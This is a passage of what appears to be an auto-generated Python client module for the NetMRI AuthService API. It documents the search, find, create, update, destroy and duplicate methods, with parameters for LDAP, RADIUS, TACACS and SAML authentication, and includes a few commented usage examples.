| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return auth_services: An array of the AuthService objects that match the specified input criteria.
:rtype auth_services: Array of AuthService
"""
return self.api_list_request(self._get_method_fullname("index"), kwargs)
def search(self, **kwargs):
"""Lists the available auth services matching the input criteria. This method provides a more flexible search interface than the index method, but searching using this method is more demanding on the system and will not perform to the same level as the index method. The input fields listed below will be used as in the index method, to filter the result, along with the optional query string and XML filter described below.
**Inputs**
| ``api version min:`` 3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param auth_method: The Authentication method of the service. One of (local, radius, tacacs, ldap, activedirectory).
:type auth_method: Array of String
| ``api version min:`` 3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param context_params_json: Additional specific authentication method parameters are stored in this field using a json format. (such as 'base_dn' for LDAP method, Vendor Specific Attribute ID for Radius,...).
:type context_params_json: Array of String
| ``api version min:`` 3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param created_at: The date and time the record was initially created in NetMRI.
:type created_at: Array of DateTime
| ``api version min:`` 3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param description: Description/comment about this authentication service
:type description: Array of String
| ``api version min:`` 3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param enabled_authz_ind: A flag indicating whether this service is used for computing privileges for the remote users.
:type enabled_authz_ind: Array of Boolean
| ``api version min:`` 3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param enabled_ind: A flag indicating whether the authentication service settings is enabled or disabled.
:type enabled_ind: Array of Boolean
| ``api version min:`` 3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param id: The id of the authentication service.
:type id: Array of Integer
| ``api version min:`` 3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param priority: The priority assigned to this Authentication Service.
:type priority: Array of Integer
| ``api version min:`` 3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param service_name: The name of the Authentication Service.
:type service_name: Array of String
| ``api version min:`` 3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param timeout: The timeout interval of the service authentication servers.
:type timeout: Array of Integer
| ``api version min:`` 3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param updated_at: The date and time the record was last modified in NetMRI.
:type updated_at: Array of DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` id
:param sort: The data field(s) to use for sorting the output. Default is id. Valid values are id, service_name, auth_method, description, priority, context_params_json, enabled_ind, enabled_authz_ind, timeout, created_at, updated_at.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each AuthService. Valid values are id, service_name, auth_method, description, priority, context_params_json, enabled_ind, enabled_authz_ind, timeout, created_at, updated_at. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param query: This value will be matched against auth services, looking to see if one or more of the listed attributes contain the passed value. You may also surround the value with '/' and '/' to perform a regular expression search rather than a containment operation. Any record that matches will be returned. The attributes searched are: auth_method, context_params_json, created_at, description, enabled_authz_ind, enabled_ind, id, priority, service_name, timeout, updated_at.
:type query: String
| ``api version min:`` 2.3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
             :param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Note that this kind of filter may be costly and inefficient if not combined with database-level filtering.
:type xml_filter: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return auth_services: An array of the AuthService objects that match the specified input criteria.
:rtype auth_services: Array of AuthService
"""
return self.api_list_request(self._get_method_fullname("search"), kwargs)
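    # Example call shapes for the methods above (a sketch; an authenticated
    # broker instance obtained from the NetMRI API client is assumed, and the
    # parameter values are illustrative):
    #
    #     broker.show(id=12)
    #     broker.index(sort=["service_name"], dir=["asc"], limit=100)
    #     broker.search(auth_method=["ldap"], enabled_ind=[True])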
def find(self, **kwargs):
"""Lists the available auth services matching the input specification. This provides the most flexible search specification of all the query mechanisms, enabling searching using comparison operations other than equality. However, it is more complex to use and will not perform as efficiently as the index or search methods. In the input descriptions below, 'field names' refers to the following fields: auth_method, context_params_json, created_at, description, enabled_authz_ind, enabled_ind, id, priority, service_name, timeout, updated_at.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_auth_method: The operator to apply to the field auth_method. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. auth_method: The Authentication method of the service. One of (local, radius, tacacs, ldap, activedirectory). For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_auth_method: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_auth_method: If op_auth_method is specified, the field named in this input will be compared to the value in auth_method using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_auth_method must be specified if op_auth_method is specified.
:type val_f_auth_method: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_auth_method: If op_auth_method is specified, this value will be compared to the value in auth_method using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_auth_method must be specified if op_auth_method is specified.
:type val_c_auth_method: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_context_params_json: The operator to apply to the field context_params_json. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. context_params_json: Additional specific authentication method parameters are stored in this field using a json format. (such as 'base_dn' for LDAP method, Vendor Specific Attribute ID for Radius,...). For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_context_params_json: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_context_params_json: If op_context_params_json is specified, the field named in this input will be compared to the value in context_params_json using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_context_params_json must be specified if op_context_params_json is specified.
:type val_f_context_params_json: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_context_params_json: If op_context_params_json is specified, this value will be compared to the value in context_params_json using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_context_params_json must be specified if op_context_params_json is specified.
:type val_c_context_params_json: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_created_at: The operator to apply to the field created_at. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. created_at: The date and time the record was initially created in NetMRI. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_created_at: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_created_at: If op_created_at is specified, the field named in this input will be compared to the value in created_at using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_created_at must be specified if op_created_at is specified.
:type val_f_created_at: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_created_at: If op_created_at is specified, this value will be compared to the value in created_at using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_created_at must be specified if op_created_at is specified.
:type val_c_created_at: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_description: The operator to apply to the field description. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. description: Description/comment about this authentication service. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_description: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_description: If op_description is specified, the field named in this input will be compared to the value in description using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_description must be specified if op_description is specified.
:type val_f_description: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_description: If op_description is specified, this value will be compared to the value in description using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_description must be specified if op_description is specified.
:type val_c_description: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_enabled_authz_ind: The operator to apply to the field enabled_authz_ind. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. enabled_authz_ind: A flag indicating whether this service is used for computing privileges for the remote users. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_enabled_authz_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_enabled_authz_ind: If op_enabled_authz_ind is specified, the field named in this input will be compared to the value in enabled_authz_ind using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_enabled_authz_ind must be specified if op_enabled_authz_ind is specified.
:type val_f_enabled_authz_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_enabled_authz_ind: If op_enabled_authz_ind is specified, this value will be compared to the value in enabled_authz_ind using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_enabled_authz_ind must be specified if op_enabled_authz_ind is specified.
:type val_c_enabled_authz_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_enabled_ind: The operator to apply to the field enabled_ind. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. enabled_ind: A flag indicating whether the authentication service settings are enabled or disabled. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_enabled_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_enabled_ind: If op_enabled_ind is specified, the field named in this input will be compared to the value in enabled_ind using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_enabled_ind must be specified if op_enabled_ind is specified.
:type val_f_enabled_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_enabled_ind: If op_enabled_ind is specified, this value will be compared to the value in enabled_ind using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_enabled_ind must be specified if op_enabled_ind is specified.
:type val_c_enabled_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_id: The operator to apply to the field id. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. id: The id of the authentication service. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_id: If op_id is specified, the field named in this input will be compared to the value in id using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_id must be specified if op_id is specified.
:type val_f_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_id: If op_id is specified, this value will be compared to the value in id using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_id must be specified if op_id is specified.
:type val_c_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_priority: The operator to apply to the field priority. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. priority: The priority assigned to this Authentication Service. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_priority: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_priority: If op_priority is specified, the field named in this input will be compared to the value in priority using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_priority must be specified if op_priority is specified.
:type val_f_priority: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_priority: If op_priority is specified, this value will be compared to the value in priority using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_priority must be specified if op_priority is specified.
:type val_c_priority: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_service_name: The operator to apply to the field service_name. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. service_name: The name of the Authentication Service. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_service_name: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_service_name: If op_service_name is specified, the field named in this input will be compared to the value in service_name using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_service_name must be specified if op_service_name is specified.
:type val_f_service_name: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_service_name: If op_service_name is specified, this value will be compared to the value in service_name using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_service_name must be specified if op_service_name is specified.
:type val_c_service_name: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_timeout: The operator to apply to the field timeout. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. timeout: The timeout interval of the service authentication servers. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_timeout: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_timeout: If op_timeout is specified, the field named in this input will be compared to the value in timeout using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_timeout must be specified if op_timeout is specified.
:type val_f_timeout: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_timeout: If op_timeout is specified, this value will be compared to the value in timeout using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_timeout must be specified if op_timeout is specified.
:type val_c_timeout: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_updated_at: The operator to apply to the field updated_at. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. updated_at: The date and time the record was last modified in NetMRI. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_updated_at: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_updated_at: If op_updated_at is specified, the field named in this input will be compared to the value in updated_at using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_updated_at must be specified if op_updated_at is specified.
:type val_f_updated_at: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_updated_at: If op_updated_at is specified, this value will be compared to the value in updated_at using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_updated_at must be specified if op_updated_at is specified.
:type val_c_updated_at: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear in the returned page, although it may not be the first record. See :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` id
:param sort: The data field(s) to use for sorting the output. Default is id. Valid values are id, service_name, auth_method, description, priority, context_params_json, enabled_ind, enabled_authz_ind, timeout, created_at, updated_at.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each AuthService. Valid values are id, service_name, auth_method, description, priority, context_params_json, enabled_ind, enabled_authz_ind, timeout, created_at, updated_at. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
| ``api version min:`` 2.3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Note that this kind of filter can be costly and inefficient if it is not combined with database-level filtering.
:type xml_filter: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return auth_services: An array of the AuthService objects that match the specified input criteria.
:rtype auth_services: Array of AuthService
"""
return self.api_list_request(self._get_method_fullname("find"), kwargs)
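    # --- Illustrative usage sketch (not part of the generated broker) -----
    # A minimal example of the op_*/val_c_* pattern accepted by find(),
    # assuming the same `client`/broker objects as in the sketch above; the
    # field values shown are assumptions for illustration only.
    #
    #   broker = client.get_broker("AuthService")
    #   ldap_services = broker.find(
    #       op_auth_method="=", val_c_auth_method="ldap",
    #       op_timeout=">=", val_c_timeout=5,
    #       sort="priority", dir="asc",
    #   )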
def destroy(self, **kwargs):
"""Deletes the specified auth service from NetMRI.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param id: The id of the authentication service.
:type id: Integer
**Outputs**
"""
return self.api_request(self._get_method_fullname("destroy"), kwargs)
def create(self, **kwargs):
"""Create a new Authentication Service
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param service_name: The name of the authentication service, must be unique
:type service_name: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param auth_method: The authentication method of the service. One of (local, radius, tacacs, ldap, activedirectory).
:type auth_method: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param priority: The priority assigned to this authentication service
:type priority: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param description: Description/comment about this authentication service
:type description: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` True
:param enabled_ind: A flag indicating whether the authentication service settings are enabled or disabled
:type enabled_ind: Boolean
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` False
:param enabled_authz_ind: A flag indicating whether this service is used for computing privileges for the remote users
:type enabled_authz_ind: Boolean
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 5
:param timeout: The timeout interval of the service authentication servers
:type timeout: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param auth_domain: Authentication Active Directory Domain name or LDAP BaseDN to use for search. (required for LDAP & Active Directory methods)
:type auth_domain: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` cn
:param user_attr: User attribute ID for LDAP authentication method (required for LDAP methods).
:type user_attr: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` memberOf
:param group_attr: Group membership attribute ID for LDAP authentication method. The LDAP server has to be configured to use memberOf Overlay.
:type group_attr: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` False
:param auth_type: A flag indicating whether the search request to the LDAP server is performed anonymously or needs authentication using a privileged bind User and Password. (values: 'true' for authenticated, 'false' for anonymous)
:type auth_type: Boolean
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param bind_user: The bind User complete 'dn' in case LDAP Authenticated connection is needed to request search to find user
:type bind_user: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param bind_passwd: The bind User password in case LDAP Authenticated connection is needed to request search to find user
:type bind_passwd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` subtree
:param search_scope: Specify the scope of the LDAP search.<br>
- 'base': Search only the base object.<br> - 'one': Search the entries immediately below the base object.<br> - 'subtree': Search the whole tree below (and including) the base object. This is the default.
:type search_scope: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` infoblox
:param tacacs_service: The name of the defined custom service for Infoblox.<br> group = GR_1{<br> service = infoblox { na-group-info = MY_GROUP_1 }<br> }
:type tacacs_service: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` na-group-info
:param tacacs_group_attr: The name of the group attribute defined in the Tacacs+ server to retrieve the user's groups list.<br> group = GR_1{<br> service = infoblox { na-group-info = MY_GROUP_1 }<br> }
:type tacacs_group_attr: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 7779
:param radius_vendor_id: The Infoblox Vendor ID defined in the radius dictionary.<br> VENDOR infoblox 7779
:type radius_vendor_id: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 10
:param radius_vsa_id: The Vendor Specific Attribute ID as defined in the radius server dictionary to retrieve the user's groups list.<br> ATTRIBUTE na-group-info 10 string infoblox
:type radius_vsa_id: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return service_id: The new authentication service id.
:rtype service_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return service_name: The new authentication service name.
:rtype service_name: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return service_description: The new authentication service description.
:rtype service_description: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return saml_entity_id: SAML Entity ID
:rtype saml_entity_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return saml_metadata: SAML Metadata URL
:rtype saml_metadata: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return saml_cacert: SAML Certificate
:rtype saml_cacert: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return saml_cacert_fn: SAML Certificate file name
:rtype saml_cacert_fn: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return saml_cacert_key: SAML Key
:rtype saml_cacert_key: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return saml_cacert_key_fn: SAML Key file name
:rtype saml_cacert_key_fn: String
"""
return self.api_request(self._get_method_fullname("create"), kwargs)
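    # --- Illustrative usage sketch (not part of the generated broker) -----
    # A minimal example of create() for an LDAP service. Every value shown
    # (service name, DN strings, password) is a placeholder, and the shape of
    # the returned mapping is assumed from the Outputs section above.
    #
    #   result = broker.create(
    #       service_name="corp-ldap",
    #       auth_method="ldap",
    #       priority=1,
    #       auth_domain="dc=example,dc=com",
    #       auth_type=True,
    #       bind_user="cn=netmri,dc=example,dc=com",
    #       bind_passwd="secret",
    #   )
    #   print(result["service_id"], result["service_name"])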
def update(self, **kwargs):
"""Update an existing Authentication Service
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param id: The id of the authentication service to modify
:type id: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param service_name: The name of the authentication service, must be unique
:type service_name: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param auth_method: The authentication method of the service. One of (local, radius, tacacs, ldap, activedirectory).
:type auth_method: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param priority: The priority assigned to this authentication service
:type priority: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param description: Description/comment of this authentication service
:type description: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param enabled_ind: A flag indicating whether the authentication service settings are enabled or disabled
:type enabled_ind: Boolean
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param enabled_authz_ind: A flag indicating whether this service is used for computing privileges for the remote users
:type enabled_authz_ind: Boolean
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param timeout: The timeout interval of the service authentication servers
:type timeout: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param auth_domain: Authentication Active Directory Domain name or LDAP BaseDN to use for search. (required for LDAP & Active Directory methods)
:type auth_domain: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param user_attr: User attribute ID for LDAP authentication method (required for LDAP methods).
:type user_attr: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param group_attr: Group membership attribute ID for LDAP authentication method. The LDAP server has to be configured to use memberOf Overlay.
:type group_attr: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param auth_type: A flag indicating whether the search request to the LDAP server is performed anonymously or needs authentication using a privileged bind User and Password. (values: 'true' for authenticated, 'false' for anonymous)
:type auth_type: Boolean
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param bind_user: The bind User complete 'dn' in case LDAP Authenticated connection is needed to request search to find user
:type bind_user: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param bind_passwd: The bind User password in case LDAP Authenticated connection is needed to request search to find user
:type bind_passwd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param search_scope: Specify the scope of the LDAP search.<br>
- 'base': Search only the base object.<br> - 'one': Search the entries immediately below the base object.<br> - 'subtree': Search the whole tree below (and including) the base object. This is the default.
:type search_scope: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param tacacs_service: The name of the defined custom service for Infoblox.<br> group = GR_1{<br> service = infoblox { na-group-info = MY_GROUP_1 }<br> }
:type tacacs_service: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param tacacs_group_attr: The name of the group attribute defined in the Tacacs+ server to retrieve the user's groups list.<br> group = GR_1{<br> service = infoblox { na-group-info = MY_GROUP_1 }<br> }
:type tacacs_group_attr: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param radius_vendor_id: The Infoblox Vendor ID defined in the radius dictionary.<br> VENDOR infoblox 7779
:type radius_vendor_id: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param radius_vsa_id: The Vendor Specific Attribute ID as defined in the radius server dictionary to retrieve the user's groups list.<br> ATTRIBUTE na-group-info 10 string infoblox
:type radius_vsa_id: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return service_id: The new authentication service id.
:rtype service_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return service_name: The new authentication service name.
:rtype service_name: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return service_description: The new authentication service description.
:rtype service_description: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return saml_entity_id: SAML Entity ID
:rtype saml_entity_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return saml_metadata: SAML Metadata URL
:rtype saml_metadata: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return saml_cacert: SAML Certificate
:rtype saml_cacert: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return saml_cacert_fn: SAML Certificate file name
:rtype saml_cacert_fn: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return saml_cacert_key: SAML Key
:rtype saml_cacert_key: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return saml_cacert_key_fn: SAML Key file name
:rtype saml_cacert_key_fn: String
"""
return self.api_request(self._get_method_fullname("update"), kwargs)
def duplicate(self, **kwargs):
"""Duplicate an authentication service.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param id: The internal NetMRI identifier for the authentication service.
:type id: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return service_id: The new authentication service id.
:rtype service_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return service_name: The new authentication service name.
:rtype service_name: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
